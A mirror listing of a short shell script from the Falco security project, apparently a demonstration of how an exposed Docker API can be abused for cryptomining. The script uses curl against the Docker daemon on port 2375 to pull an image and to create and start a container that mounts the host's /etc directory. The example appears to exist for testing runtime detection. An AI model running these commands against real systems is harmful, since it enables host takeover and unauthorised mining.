mirror of
https://github.com/falcosecurity/falco.git
synced 2025-10-26 14:43:51 +00:00
An example showing how an overly permissive container environment can be exploited to install and run cryptomining software on a host system.
15 lines
538 B
Bash
15 lines
538 B
Bash
#!/bin/sh
|
|
|
|
echo "Pulling alpine:latest image to docker-in-docker instance"
|
|
curl -X POST 'http://localhost:2375/images/create?fromImage=alpine&tag=latest'
|
|
|
|
echo "Creating container mounting /etc from host-machine"
|
|
curl -H 'Content-Type: application/json' -d @docker123321-mysql-container.json -X POST 'http://localhost:2375/containers/create?&name=docker123321-mysql'
|
|
|
|
echo "Running container mounting /etc from host-machine"
|
|
curl -H 'Content-Type: application/json' -X POST 'http://localhost:2375/containers/docker123321-mysql/start'
|
|
|
|
|
|
|
|
|